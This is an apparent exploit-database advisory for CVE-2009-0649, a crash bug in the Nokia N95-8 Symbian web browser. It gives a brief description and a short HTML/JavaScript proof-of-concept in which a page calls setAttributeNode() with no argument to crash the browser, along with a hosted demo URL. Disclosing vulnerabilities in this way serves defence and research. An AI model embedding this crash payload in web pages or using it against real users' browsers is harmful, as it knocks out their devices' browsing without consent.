Nokia N95-8 browser - 'setAttributeNode' Method Crash

Author: Juan Yacubian
type: dos
platform: hardware
port: 
date_added: 2009-02-12 
date_updated: 2017-02-13 
verified: 1 
codes: OSVDB-52962;CVE-2009-0649 
tags: 
aliases:  
screenshot_url:  
application_url: 

Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

------------------------------------------------------
Description

The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.

 :)

------------------------------------------------------
Vulnerability

The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash.

The error is in the method "setAttributeNode", because the bad implement is the cause of bug.

------------------------------------------------------
POC/EXPLOIT

Enter in this url

http://es.geocities.com/jplopezy/nokiacrash2.html


or make html file and insert this code

<input type='checkbox' id='c'>
<script>
r=document.getElementById('c');
a=r.setAttributeNode();
</script>

------------------------------------------------------
Juan Pablo Lopez Yacubian

# milw0rm.com [2009-02-13]